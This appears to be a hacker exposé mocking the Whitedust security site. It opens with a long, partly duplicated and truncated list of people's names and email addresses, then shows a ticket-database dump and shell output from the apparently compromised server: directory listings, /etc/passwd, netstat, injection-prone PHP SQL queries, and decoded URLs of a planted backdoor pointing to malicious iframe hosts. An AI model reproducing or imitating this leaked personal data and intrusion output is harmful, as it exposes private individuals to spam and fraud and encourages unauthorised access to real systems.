'hilarymorgan(a)iolfree.ie'); 'Gus Lynch', 'gus_lynch(a)dell.com'); 'Margaret Prendergast', 'margaret.prendergast(a)ceu.eu.int'); 'Kerian Gorey & Claire Moran', 'cmoran(a)kildarecoco.ie'); 'Louise Hogan & Colm Devitt', 'louise(a)bluepages.ie'); 'Derek McDonnell', 'manager.knocklyon(a)superquinn.ie'); 'Winfried Scheidges', 'Ludwin(a)eircom.net'); 'Michael & Geraldine Littler', '8littleg(a)ie.ibm.com'); 'Catheriona & Colm Molloy', 'Colm.Molloy(a)firstchoice.co.uk') 'Catheriona & Colm Molloy', 'Colm.Molloy(a)firstchoice.co.uk') 'Justice & Lydia Mushayabasa', 'justicemush(a)eircom.net'); 'Fergal Finnerty', 'fergalfinnerty(a)yahoo.com'); 'Mary Moriarty', 'mmmoriarty(a)hotmail.com'); 'Eileen Mooney & Gareth Egan', 'gegan(a)mortgagelink.ie'); 'Gordon Flood & Sarah Halgarth', 'gordonflood(a)eircom.net'); 'Gerard & Sibolnile Chimbganda', 'gchimnz(a)yahoo.com'); 'Gunther Plank & Bernice Howe', 'gunther.plank(a)kti.ie'); 'Robert Reddin & Alison Behan', 'robbier(a)bizquip.ie'); 'Paul Barry', 'pbstbsttdr(a)aol'); 'Mark Geoghegan', 'aquaclean(a)eircom.net'); 'Michael Nolan', 'mnolans(a)eircom.net'); 'Suzanne Wren', 'suzanne.wren(a)map.ie'); 'Raymond & Jenny Wallace', 'raymondpwallace(a)eircom.net'); 'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com 'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com 'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com' 'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com' 'Linda Nolan', 'lindanolan50(a)hotmail.com'); 'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c 'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c 'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie 'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie 'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com'); 'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com'); 'Julliana Mullin', 'julie_mullin(a)hotmail.com'); 'James & Monica Mullin', 'julie_mullin(a)hotmail.com'); 'Rory Conway & Maeve Gromley', 'r_conway(a)vodafone.ie'); 'Niamh O\\''Connor & Jonathon Myers', 'niamh.myer(a)cw.com'); 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk'); 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech 'Yvonne & Karen Dalton', 'remaxroyalcounty(a)eircom.net'); 'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com' 'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com' 'Linda Nolan', 'lindanolan50(a)hotmail.com'); 'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c 'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c 'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie 'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie 'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com'); 'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com'); 'Julliana Mullin', 'julie_mullin(a)hotmail.com'); 'James & Monica Mullin', 'julie_mullin(a)hotmail.com'); 'Rory Conway & Maeve Gromley', 'r_conway(a)vodafone.ie'); 'Niamh O\\''Connor & Jonathon Myers', 'niamh.myer(a)cw.com'); 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk'); 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech 'Yvonne & Karen Dalton', 'remaxroyalcounty(a)eircom.net'); 'Helene Enberg', 'helene_enberg(a)hotmail.com'); 'Orlaith Egan', 'oegan(a)wccprojectoffice.ie'); 'Pauric Reilly', 'pauric.reilly(a)maild.hse.ie'); 'Elliott & Eri McNamara', 'elliott.mcnamara(a)intel.com'); 'Ita Healy', 'mihealy(a)eircom.net'); 'Susan Cosgrove', '5796(a)campus.ie'); 'Mary Butler & Ciaran Hughes', 'mary.butler(a)unilever.com'); 'Martin Traynor', 'marko1980(a)hotmail.com'); 'Ian Deacon & Anna-Marie Brennan', 'ideac123(a)hotmail.com'); 'Stephan Davis & Alexia Davy', 'Stephend(a)ocallaghanhotels.ie 'Stephan Davis & Alexia Davy', 'Stephend(a)ocallaghanhotels.ie 'Craig O Brien', 'devers999(a)hotmail.com'); 'Anna Connolly', 'connollya(a)eircell.ie'); 'Edward Costello', 'eddie.costello(a)esat.com'); 'Conor Feeney & Caroline Miskella', 'conor.feeney(a)bankofscot 'Conor Feeney & Caroline Miskella', 'conor.feeney(a)bankofscot 'Gary & Ruth Donnelly', 'gary.donnelly(a)firstactive.com'); 'Veronica McHugh', 'vmchugh(a)rotunda.ie'); 'Jason Breen & Amanda Brown', 'A.brown(a)frkelly.ie'); 'Liam Barry', 'liambarry(a)eircom.net'); 'Veronica McHugh', 'vmchugh(a)rotunda.ie'); 'Kevin & Catherine Povall', 'kevpovall(a)eircom.net'); 'Eimear Keogh', 'e.keogh(a)dublinpeople.ie'); 'Maria Hogan & Ollie O Farrell', 'oliver.o\\''farrell(a)smartf 'Maria Hogan & Ollie O Farrell', 'oliver.o\\''farrell(a)smartf 'Patricia Loh & Alan McArdle', 'ploh(a)eircom.ie'); 'Louise Hogan', 'louise(a)bluepages.ie'); 'Brendan Kelly', 'bwkelly(a)eircom.net'); 'Brendan Kelly', 'bwkelly(a)eircom.net'); 'Fintan O\\''Connor', 'foconnor(a)esat.ie'); 'Ian Hopkins', 'ian.hopkins(a)iec-logistic'); 'Denis & Marie Carty', 'Dcarty(a)lgcsb.ie'); 'Brian Motherway & Naomi Farrell', 'brian_motherway(a)guinness 'Brian Motherway & Naomi Farrell', 'brian_motherway(a)guinness 'Niall Gormley & Josephine O\\''Reilly', 'newsbase(a)eircom.ne 'Niall Gormley & Josephine O\\''Reilly', 'newsbase(a)eircom.ne 'Sandra Morris', 'smorris(a)bwg.ie'); 'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste 'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste 'Lynsey Kenna', 'lkenna(a)woodcomm.ie'); 'Gemma Sheridan', 'gsheridan(a)espatial.com'); 'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste 'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste 'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com') 'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com') 'Paula Lawlor & David Smith', 'manager.cl(a)firstchoicetravel. 'Paula Lawlor & David Smith', 'manager.cl(a)firstchoicetravel. 'Christopher Kenny & Marie McCaffrey', 'marie.mccaffrey(a)dubl 'Christopher Kenny & Marie McCaffrey', 'marie.mccaffrey(a)dubl 'Fiona Kavanagh', 'rkavan(a)eircom.ie'); 'John Devlin & Gemma Woods', 'johndevlin40(a)hotmail.com'); 'Robert Archbold & Sandra Morris', 'rarchbold(a)heitons.ie'); 'Barry Hearns', 'rkavan(a)eircom.ie'); 'John Doherty', 'bussybee(a)milton-institute.ie'); 'Niamh O`Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com') 'Niamh O`Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com') 'Alison O`Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co 'Alison O`Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co 'Simon Doherty', 'simondoherty(a)fineos.com'); 'Craig O Brien', 'devers999(a)hotmail.com'); 'Iulian & Anne Iurascu', 'iurascu(a)eircom.net'); 'Diarmuid & Avril McHugh', 'dmchugh(a)mchughgroup.ie'); 'Brendan Kelly', 'bwkelly(a)eircom.net'); 'Tony & Susan dunne', 'anthony.dunne(a)pioneerinvest.ie'); 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com 'Diarmuid Kelly & Rachel Corcoran', 'diarmuid.kelly(a)piba.ie' 'Diarmuid Kelly & Rachel Corcoran', 'diarmuid.kelly(a)piba.ie' 'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk'); 'Thomas & Margaret Geraghy', 'tommygeraghty(a)gmail.com'); 'Mel O Carroll', 'mel_ocarroll(a)ml.com'); 'Barry Lonergan & Kelley Mc Donagh', 'barry_lonergan(a)02.ie') 'Barry Lonergan & Kelley Mc Donagh', 'barry_lonergan(a)02.ie') 'Karen Hynes & Robert O reilly', 'oreilly(a)hp.com'); 'David O Neill & Eve Mulvaney', 'evemulvaney(a)anpost.ie'); 'Shane Sloan', 'Shane.Sloan(a)intel.com'); 'Elaine O Rourke & Mark Davis', 'elaine(a)tpi.ie'); 'Alan Mooney & Claire Noonan', 'MooneyAlan(a)aol.com'); 'Leona Keegan & Ciaran Cullinan', 'leona_keegan(a)ml.com'); 'Eamonn Meehan', 'eamonn(a)bordahl.ie'); 'Graham & Roslyn Elgie', 'graham.elgie(a)gmail.com'); 'Mark & Jane Lawlor', 'janelawlor(a)eircom.net'); 'David Healey & Karen McElhinnery', 'david.healey(a)ntl.com'); 'Morgan Keogh & Hillary Madden', 'morgan.keogh(a)hughjordan.co 'Morgan Keogh & Hillary Madden', 'morgan.keogh(a)hughjordan.co 'Gavin Egan', 'gegan01(a)yahoo.com'); 'Like Carroll & Victoria Vogel', 'victoria.vogel(a)marine.ie') 'Like Carroll & Victoria Vogel', 'victoria.vogel(a)marine.ie') 'James Williams', 'jamesw-tedrum(a)yahoo.ie'); 'Damien Hickey', 'damien(a)freewayie.com'); 'Joseph Loftus', 'joe.loftus(a)amo-inc.com'); 'Sean & Fiona Fennelly', 'sean.b.fennelly(a)intel.com'); 'Paul Corcoran & Fiona Moran', 'fiona.moran(a)drm.ie'); 'Robert Ennis', 'robennis122(a)hotmail.com'); 'Sarah Rogers & Sean Cassidy', 'smith cassidy(a)eircom.net'); ' Jacqueline Duggan', 'jackie.duggan(a)firstactive.com'); 'Cyril Gordet', 'cyrilgordet(a)hotmail.com'); 'Cyril Gordet', 'cyrilgordet(a)hotmail.com'); 'Ian Leach', 'ian.leach(a)spcorp.com'); 'Tom & Aideen Maher', 'tmaher61(a)indigo.ie'); 'Martin & Sinead Finnegan', 'scd141273(a)eircom.net'); 'Pat Gallagher', 'pat.gallagher(a)gtm.ie'); 'Ciaran Fitzpatrick', 'ciaranfitzpatrick(a)hotmail.com'); 'Windsor Landan & Stephanie Ennis', 'windsor(a)iolfree.ie'); 'Dermot & Marueen Peakin', 'marueenpeakin(a)hotmail.com'); 'Fintan O Connor & Eavan Breslin', 'Foconnor(a)esat.ie'); 'Stewart Steele', 'stewart.steele(a)siemens.ie'); 'Gunther Plank & Bernice Howe', 'Plank_Gun(a)yahoo.ie'); 'Gerry & Marian Murphy', 'cgMruphy.gofree.eircom.ie'); 'Sean Cassidy & Shakira Nelis', 'sean_cassidy(a)ryan-hotels.co 'Sean Cassidy & Shakira Nelis', 'sean_cassidy(a)ryan-hotels.co 'Patrict & Janet Hobbs', 'PandJhobbs(a)eircom,net'); 'Donal & Siobhan Howe', 'howby(a)eircom.net'); 'Anthony & Ann Burton', 'aburton(a)uprighteuro.com'); 'Dermot & Lorraine McMullan', 'Dermotmcm(a)oceanfree.net'); 'Carmel McManus', 'carmel_mcmanus(a)entemp.ie'); 'Liam & Jean Keane', 'liam.keane(a)tecnomen.ie'); 'Claire Gillard & Billy Foley', 'claire.gillard(a)yahoo.com'); 'Noelle McCabe & James King', 'noelle.mccabe(a)connectcgs.com' 'Noelle McCabe & James King', 'noelle.mccabe(a)connectcgs.com' 'Gerry & Clare Nolan', 'gerry.nolan(a)investec.ie'); 'Ciara & Stephen O\\''Brien', 'ciara_davis(a)hotmail.com'); 'John & Aine Godson', 'john.godson(a)aramco.com'); 'Dr Pradeep & Rita Chadha', 'chadhap(a)indigo.ie'); 'Stephen Moran & Amanda Daunt', 'Stephen.Moran(a)permanenttsb. ==The Black and White Ball Some of you may remember this ill-fated attempt to make money. In February 2007 Whitedust announced they were hosting a hacker conference in September. It was to be split into "Whitehat" and "Blackhat" sections. In July the website changed to a one-page message saying that the conference had to be cancelled due to banking difficulties. The duo then proceeded to never mention the conference again. For anybody suspicious about this, here is the real reason the B&W Ball had to be cancelled: -- -- Table structure for table `bw_tickets` -- CREATE TABLE `bw_tickets` ( `TicketID` bigint(10) NOT NULL auto_increment, `TicketRand` varchar(15) default NULL, `Name` varchar(100) default NULL, `Company` varchar(100) default NULL, `Address` text, `Telephone` varchar(100) default NULL, `Fax` varchar(100) default NULL, `Email` varchar(100) default NULL, `fAllAccess` tinyint(1) default NULL, `fWhite` tinyint(1) default NULL, `fBlack` tinyint(1) default NULL, PRIMARY KEY (`TicketID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ; -- -- Dumping data for table `bw_tickets` -- INSERT INTO `bw_tickets` VALUES (1, '123456789012345', 'Mark Anderson', 'Mercury Software', NULL, NULL, NULL, NULL, 1, 0, 0); INSERT INTO `bw_tickets` VALUES (2, '253453453645645', 'Mark Hinge', 'Pirates Inc.', NULL, NULL, NULL, NULL, NULL, 1, NULL); INSERT INTO `bw_tickets` VALUES (3, '563524352342343', 'Peter Prickett', 'Pricket & Co', NULL, NULL, NULL, NULL, NULL, NULL, 1); -- -------------------------------------------------------- That's right, the only tickets they "sold" were to Cronus, psg, and chickensoup. Check out how Peter Prickett is the blackhat of SoL. Is it just me or were the talks on the blackhat panel no different from the talks on the whitehat panel? Why did the ball find itself so unpopular? Let's suggest some points: - It was hosted over four days. This was probably to get as much money as possible from attendees drinking. - Only one talk running at a time. - It held only 20 talks in total. - These talks were lame. - You could see half the speakers in Defcon. - They stole the name from Defcon. - Whitedust has no credibility. - Whitedust's legions of 14 year old virgins/wannabes/php coders can't afford a con - People in the security industry don't want to go to a conference with no new material - The cost was 320 euros! psg lacks understanding - "You'd spend that much if you went to the black hat briefings though... the difference between a corporate conference and the defcon side event... and B&W is longer." Sure, you could pay less to go for only two days and see half the shitty talks. Or you could pay 1/5 of the price to go to Defcon and see many more talks, generally of a higher quality, and be able to choose what to see out. The quality of talk at the B&W Ball called for a small entrance fee, if you are in the 320 euro range then you need to have a higher quality of talks, or at least something new, to attract corporate slaves. All of the speakers either signed up for the free trip or because they wanted to pad their resume with yet another talk this year. Of course, this could easily be an area where the Whitedust folks lie about, because it is kind of embarassing. Maybe they'll say that people could not be added until the banking issues were cleared up, and that these were only free tickets. However, the link for Tickets was still up, with an email address to contact to arrange financial information. Can anyone say they actually tried that, and were told to wait a bit while details were sorted out? ==whitedust.net Here comes your fun. The big WD itself. $ ls -la / drwxr-xr-x 25 root root 4096 Apr 12 11:48 . drwxr-xr-x 25 root root 4096 Apr 12 11:48 .. -rw------- 1 root root 23552 Aug 3 11:47 aquota.group -rw------- 1 root root 24576 Aug 3 11:47 aquota.user -rw-r--r-- 1 root root 0 Mar 10 15:49 .autofsck drwxr-xr-x 2 root root 4096 Jun 27 04:04 bin drwxr-xr-x 3 root root 4096 Mar 10 15:47 boot drwxr-xr-x 9 root root 4520 Jun 26 15:13 dev drwxr-xr-x 66 root root 12288 Aug 3 10:25 etc drwx--x--x 877 root root 20480 Aug 2 20:52 home drwxr-xr-x 2 root root 4096 Aug 12 2004 initrd drwxr-xr-x 12 root root 4096 Aug 1 04:06 lib drwx------ 2 root root 16384 Mar 9 23:07 lost+found drwxr-xr-x 3 root root 4096 Jun 26 15:13 media drwxr-xr-x 2 root root 4096 Apr 11 20:27 misc drwxr-xr-x 2 root root 4096 Aug 12 2004 mnt drwxr-xr-x 2 root root 4096 Apr 26 15:25 opt dr-xr-xr-x 481 root root 0 Mar 10 15:49 proc drwxr-x--- 10 root root 4096 Jul 27 13:59 root drwxr-xr-x 2 root root 12288 Jul 3 04:04 sbin drwxr-xr-x 2 root root 4096 Mar 9 23:09 selinux drwx------ 2 root root 4096 Mar 12 04:17 .spamassassin drwxr-xr-x 2 root root 4096 Aug 12 2004 srv drwxr-xr-x 9 root root 0 Mar 10 15:49 sys -rw-r--r-- 1 root root 77258 Apr 12 11:44 temp.txt drwxrwxrwt 8 root root 888832 Aug 3 12:45 tmp drwxr-xr-x 2 root root 4096 Apr 1 10:30 update drwxr-xr-x 17 root root 4096 Mar 10 16:52 usr drwxr-xr-x 23 root root 4096 Mar 12 11:07 var $ head -50 /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin apache:x:100:500::/var/www:/bin/false diradmin:x:101:101::/usr/local/directadmin:/bin/bash mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash admin:x:500:501::/home/admin:/bin/bash dovecot:x:104:104::/home/dovecot:/bin/bash clamav:x:501:502:ClamAV User:/home/clamav:/bin/bash testerdoma:x:502:503::/home/testerdoma:/bin/false hola123456:x:503:504::/home/hola123456:/bin/false qetuoa:x:504:505::/home/qetuoa:/bin/bash mark:x:505:506::/home/mark:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin olympus:x:506:507::/home/olympus:/bin/false kieranl:x:507:508::/home/kieranl:/bin/false termad:x:508:509::/home/termad:/bin/false dairymaste:x:509:510::/home/dairymaste:/bin/false ballyduff:x:510:511::/home/ballyduff:/bin/false dairyking:x:511:512::/home/dairyking:/bin/false emagri:x:512:513::/home/emagri:/bin/false imqcs:x:513:514::/home/imqcs:/bin/false In case anyone was wondering, their sshd is full "Privilege-separated"! Thanks, host, for descriptive names. $ wc -l /etc/passwd 907 /etc/passwd $ netstat | head -30 Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 lala.blacknight.ie:11553 *:* LISTEN tcp 0 0 *:1505 *:* LISTEN tcp 0 0 *:rwhois *:* LISTEN tcp 0 0 *:imaps *:* LISTEN tcp 0 0 *:pop3s *:* LISTEN tcp 0 0 *:smux *:* LISTEN tcp 0 0 *:mysql *:* LISTEN tcp 0 0 *:submission *:* LISTEN tcp 0 0 *:2222 *:* LISTEN tcp 0 0 *:pop3 *:* LISTEN tcp 0 0 *:imap *:* LISTEN tcp 0 0 *:http *:* LISTEN tcp 0 0 gorlois.blacknight.ie:http adolfo-icatm106728-la:49217 SYN_RECV tcp 0 0 gorlois.blacknight.ie:http host86-141-170-77.rang:3622 SYN_RECV tcp 0 0 gorlois.blacknight.ie:http coopzoo178.ucc.ie:4751 SYN_RECV tcp 0 0 *:ftp *:* LISTEN tcp 0 0 252-101.colo.sta.bla:domain *:* LISTEN tcp 0 0 252-99.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-98.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-97.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-96.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-95.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-92.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-93.colo.sta.blac:domain *:* LISTEN tcp 0 0 252-89.colo.sta.blac:domain *:* LISTEN tcp 0 0 gorlois.blacknight.i:domain *:* LISTEN tcp 0 0 lala.blacknight.ie:domain *:* LISTEN tcp 0 0 lala.blacknight.ie:domain *:* LISTEN That's just to give you an idea of the server they are hosted on. We don't have root, and there was no need to get it. $ ls 1.css blackdust cp_changepassword.php cp_managesections.php filter.php login.php search.php 404handler.php cache cp_createpage.php cp_newsreader.php images logout.php sections.php archive.php captcha cp_deletenews.php cp_postnews.php inc-footer.php Mail sessions awstats cgi-bin cp_deletepage.php cp_postsidenews.php inc-header.php Mail.php shop backup20070105 common cp_editnews.php cronusblogimages index.php PEAR.php viewnews.php backup20070717 controlpanel.php cp_editpage.php data_referers.txt labs publishing viewpage.php $ ls awstats/ bookmarks.html $ perl -lne 'print $1 if m!"(http://[\w-./]+)"!;' awstats/bookmarks.html http://www.textscene.com/ http://www.neworder.box.sk/ http://antionline.com/ http://www.evilhosting.org/ http://reallifecomics.com/ http://www.clutzed.com/ http://www.hungryhacker.com/ http://www.thegreatone.me.uk/ http://www.steinsky.me.uk/ http://www.infectedloser.com/ http://www.whitedust.net/ http://slashdot.org/ http://www.topix.net/tech/computer-security http://news.zdnet.co.uk/internet/security/ http://www.theregister.co.uk/ http://www.computerworld.com/ http://www.securityfocus.com/ http://www.eweek.com/ http://www.indymedia.org.uk/en/regions/london/ http://www.wbglinks.net/ http://www.macnewsworld.com/ http://www.linuxsecurity.net/ http://packetstormsecurity.nl/ http://news.bbc.co.uk/ http://www.internetsecuritynews.com/ http://www.securitypipeline.com/ http://www.clutzed.com/forum http://roxorz.org/phpbb/ http://www.soljo.org/london/forum/ http://www.second-time-around.co.uk/phpBB2/index.php http://addendum.proboards22.com/ http://maddox.xmission.com/ http://www.spaced-out.org.uk/ http://www.merentha.com/ http://www.vampiretheseduction.net/html/ http://merenthaunderground.frostenterprises.com/home.htm http://www.patman.org/wod/wodindex.asp http://www.palmblvd.com/ http://www.bb4win.org/news.php http://whitedust.net/awstats/ http://www.submitcorner.com/Tools/Submit/ http://www.sms.ac/ http://searchenginewatch.com/facts/article.php/2156041 http://world.altavista.com/ http://www.publicproxyservers.com/page1.html http://www.webstats.xcalibre.co.uk/ http://www.xcalibre.co.uk/status.php http://cp.xcalibre.co.uk/ http://www.bt.com/favicon.ico http://svr1.16o.com/tools/qmailadmin/ http://www.uksmallbusinessdirectory.co.uk/ http://www.start-linux.com/ http://www.feeds4all.com/ http://www.securiteam.com/exploits/ http://exploitwatch.org/modules/evennews/ http://www.8th-wonder.net/exploits.dxd http://johnny.ihackstuff.com/ http://neworder.box.sk/explmore.php http://www.k-otik.com/english/index.php http://londonlostandfound.com/free/freereviews.htm http://www.masternewmedia.org/rss/top55/ http://www.worldcomputerexchange.org/ http://www.gamespot.com/ps2/action/gta4/hints.html http://attrition.org/security/commentary/ http://searchsecurity.techtarget.com/ http://www.securitypark.co.uk/ http://lists.freebsd.org/mailman/listinfo http://www.insecure.org/ http://blackhat.com/ http://www.dynamichell.com/e107/news.php http://www.infoanarchy.org/ http://www.microsoft.com/technet/security/bulletin/advance.mspx As you can see, that's a really elite hacker there. They steal all their news from only the best sites. $ ls Mail Net PEAR.php RFC822.php mail.php mime.php mimeDecode.php mimePart.php null.php sendmail.php smtp.php xmail.dtd xmail.xsl $ ls blackdust/ blackdust-small.png blackdust.png cgi-bin index.php search.php style.css blackdust.net.zip blackdust.xml customize.php referrals.txt spacer.gif $ head blackdust/referrals.txt http://www.dinside.no/artikler/whitedust/artid390761.html http://www.dinside.no/artikler/whitedust/artid390761.html http://www.dinside.no/php/art.php?id=390761 http://www.dinside.no/artikler/whitedust/artid390761.html http://www.google.no/search?hl=no&q=Whitedust&btnG=S%C3%B8k&meta= http://www.dinside.no/artikler/whitedust/artid390761.html http://www.abcnyheter.no/node/49761 http://www.dinside.no/artikler/whitedust/artid390761.html http://www.sol.no/ http://www.dinside.no/artikler/whitedust/artid390761.html $ head -20 blackdust/search.php $value) { $link .= "&" . urlencode($name) . "=" . urlencode($value); if ($name == "query") { $query = $value; } if ($name == "q") { $query = $value; } } $data = file_get_contents ($link); $data = str_replace ("\\"", """, $data); $data = str_replace ("\\'", "'", $data); $searchCountry = " $ grep -i select labs/eve/apreg.php $db_selected = mysql_select_db($db_db, $db_remote); if (!$db_selected) { die('DB ERROR, could not select $db_db database: ' . mysql_error()); $sqlchk = "select Username from serials where (Username = '$username')"; $sqlchk = "select Serial from serials where (Email = '$email' and Serial = '$serial')"; $sqllst = "select Username, Password from serials where (Username != '' and Password != '')"; $ ls labs/gypsy/ GypsyBETA2.rar contact.php install.php paypal.jpg ss-dos.jpg ss-main-thumb.jpg ss-menu.jpg about.php download.php logo.jpg screenshots.php ss-emu-thumb.jpg ss-main.jpg banner-standard.jpg index.php packages.php ss-dos-thumb.jpg ss-emu.jpg ss-menu-thumb.jpg $ ls publishing/ 1.css archive images inc-footer.php inc-header.php index.php $ ls publishing/archive/ Other Other.rar RWM.rar SPACT.rar b0rk b0rk.rar doj doj.rar rwm soljo soljo.rar spact $ ls shop/ 1.css cgi-bin eveonline.php images inc-footer.php inc-header.php index.php $ cat data_referers.txt http://blackdust.whitedust.net/ http://www.cultdeadcow.com/cms/main.php3 http://my.yahoo.com/p/d.html http://my.yahoo.com/p/d.html RSS Concentrator $ ls common/ classes inc-conf.php inc-db.php inc-library.php lastRSS.php modrestoreblog.php rss.php $ ls common/classes/ cBlogs.php cComments.php cNews.php cPages.php cProfiles.php cRSS.php cReferrals.php cUsers.php $ grep -i select common/classes/cUsers.php $retchk = mysql_query ("select UserID from wd3_users where (Username = '$username' and Email = '$email' and UserID = '$I' and ActivateKey = '$key')", $db_remote); $retchk = mysql_query ("select UserID, Email, Username, ActivateKey from wd3_users where (Username = '$username' or Email = '$email')", $db_remote); $retchk = mysql_query ("select UserID, Priv, LastIP, LastLogin, Email, Active from wd3_users where (Username = '$username' and Password = '$cpassword')", $db_remote); $retsel = mysql_query ("select Username from wd3_users where (UserID = '$userid')", $db_remote); $retchk = mysql_query ("select UserID, Priv, LastIP, LastLogin, Email, Active from wd3_users where (Username = '$username' and Password = '$cpassword')", $db_remote); $retchk = mysql_query ("select InviteID from wd3_invites where (Email = '$email' and RSVP = 0)", $db_remote); $retchk = mysql_query ("select UserID from wd3_users where (Email = '$email')", $db_remote); $retchk = mysql_query ("select UserID from wd3_users where (Username = '$username')", $db_remote); $retchk = mysql_query ("select UserID from wd3_users where (ActivateKey = '$key')", $db_remote); $ head common/inc-conf.php $ ls backup20070105/consulting/ consulting-link.png development.php index.php testing.php wdc-mainpagelinkconcept.png design.php graphics research.php training.php wdc-minisite-concept.png I bet they didn't get many requests for their elite knowledge and skills. $ ls backup20070105/101 addcomment.php articlesonly.rss data_articles.txt data_sections.txt emailtofriend.php index.php wd.css archives101.php base.php data_articles101.txt data_yesterdaysnews.txt getpdf.php printpage.php articles.rss cgi-bin data_news.txt date.php header101-small.jpg section101.php articles101.rss data_archive.txt data_news101.txt download.php header2101-small.jpg time.php Check it out, someone owned Whitedust and the backdoor didn't get removed. $ cat backup20070101/101/download.php $ diff backup20070101/101/date.php backup20070101/101/download.php $ cat backup20070101/101/base.php $ diff backup20070101/101/base.php backup20070101/101/time.php $ cat backup20070101/101/.htaccess Options -MultiViews ErrorDocument 404 //101/base.php Options -MultiViews ErrorDocument 404 //time.php Although the backdoor could have been inserted at any time, the .htaccess looks like it was built for the original setup. Allow us to save you the time decoding the base64. aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9 : http://bis.iframe.ru/master.php?r_addr= aHR0cDovLw== : http dXNlcjkubXNodG1sLnJ1 : user9.mshtml.ru dXNlcjcuaHRtbHRhZ3MucnU= : user7.htmltags.ru So, some elite Russian hax0rs owned Whitedust and added four php files to the directory. They then added a .htaccess with custom 404s to make it even easier for them. That easily could be from some mass 0wning tool. How the hell did Whitedust not notice this? Could the backdoors be any more obvious? Even if just one was found it should have lead to the others being noticed immediately. Did Cronus and psg just _never_ check out their website files, or review their code, let alone do any security checks? Now let's check out the July backups. $ ls backup20070717/ 0day.php admin_editpage.php con forums index-survey.php projects.php 1.css admin_editsection.php data_articles.thtml forums_old index.php robots.txt 101 admin_internalad.php data_currenteditorial.thtml 